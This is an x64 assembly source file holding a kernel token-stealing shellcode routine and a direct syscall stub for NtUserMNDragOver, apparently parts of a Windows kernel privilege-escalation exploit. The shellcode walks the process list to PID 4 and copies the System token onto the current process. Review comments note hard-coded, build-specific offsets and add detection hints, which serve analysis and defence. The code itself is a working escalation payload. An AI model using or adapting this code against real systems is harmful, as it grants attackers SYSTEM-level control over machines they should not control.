

public ShellCode 
public NtUserMNDragOver

.code


;-----------------------------------------------------------------------
; ShellCode - kernel-mode token-replacement routine (MASM, x64).
;
; Follows the process list from the current process until it reaches the
; entry whose PID field equals 4, then copies that entry's token field
; over the current process's token field.
;
; In:    none (reads the current thread through gs, so it is only
;        meaningful when executed in kernel mode)
; Out:   none; RFLAGS, rax, rdx and rbx are saved on entry and restored
;        before ret
;
; NOTE(review): every structure offset below (188h, 210h, 208h, 180h) is
; hard-coded. They look like the layouts of one specific Windows x64
; build - confirm against that build's symbols. On any other build the
; same offsets address unrelated fields.
; NOTE(review): the list walk has no bound and no validity check on the
; links; the only exit is finding PID == 4.
; Detection: once this has run, the current process's token field holds
; the same value as the PID 4 process's token field. A non-system
; process sharing that token value is a strong forensic indicator of
; this technique.
;-----------------------------------------------------------------------
ShellCode proc

		pushfq                ; save RFLAGS (cmp below modifies them)
		push rax              ; save the three scratch registers used here
		push rdx
		push rbx
		mov rax, gs:[188h]    ; rax = current thread object
		mov rax, [rax + 210h] ; rax = process object owning the current thread
		lea rdx, [rax + 208h] ; rdx = address of the current process's token field
noFind :
		mov rax, [rax + 188h] ; rax = forward link of ActiveProcessLinks (points into the next entry)
		sub rax, 188h         ; step back from the link field to the base of that process object
		mov rbx, [rax + 180h] ; rbx = PID of this entry
		cmp rbx, 4            ; PID 4 is the System process
		jnz noFind            ; not PID 4: follow the next link
		mov rax, [rax + 208h] ; rax = raw token field value of the PID 4 process
		mov [rdx], rax        ; overwrite the current process's token field with it
		pop rbx               ; restore registers in reverse push order
		pop rdx
		pop rax
		popfq                 ; restore RFLAGS
		ret

ShellCode endp


;-----------------------------------------------------------------------
; NtUserMNDragOver - direct system-call stub (MASM, x64).
;
; Issues system service number 12DEh with the caller's register
; arguments passed through unchanged, and returns with whatever the
; kernel left in rax.
;
; In:    rcx, rdx, r8, r9 = arguments as supplied by the caller
; Out:   rax = value returned by the system service
; Clobb: r10, plus rcx and r11 (overwritten by the syscall instruction)
;
; NOTE(review): 12DEh is a hard-coded service number. System service
; numbers differ between Windows builds, so this stub presumably targets
; one specific build - confirm which one.
; Detection: a call made through this stub never passes through the
; system DLL's exported wrapper, so user-mode hooks placed on that
; wrapper do not observe it. A syscall instruction executing from a
; module other than the system DLLs is itself a useful signal.
;-----------------------------------------------------------------------
NtUserMNDragOver proc
	mov     r10, rcx        ; first argument goes in r10 because syscall overwrites rcx
	mov     eax, 12DEh      ; system service number (build-specific, see note above)
	syscall                 ; enter the kernel
	ret                     ; rax holds the service's return value
NtUserMNDragOver endp



end